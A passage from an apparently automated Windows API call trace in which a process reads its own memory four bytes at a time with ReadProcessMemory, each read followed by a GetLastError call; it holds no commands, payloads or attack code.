lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400122, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400123, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400124, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400125, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400126, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400127, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400128, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400129, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400130, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400131, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400132, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400133, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400134, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400135, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400136, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400137, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400138, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400139, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400140, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400141, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400142, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.506] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400143, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.506] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400144, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400145, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400146, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400147, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400148, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400149, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400150, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400151, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400152, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400153, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400154, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400155, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400156, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400157, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400158, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400159, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.507] GetLastError () returned 0x0 [0079.507] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400160, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400161, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400162, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400163, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400164, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400165, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400166, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400167, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400168, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400169, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400170, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400171, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400172, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.508] GetLastError () returned 0x0 [0079.508] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400173, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400174, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400175, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400176, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400177, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400178, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400179, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400180, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, 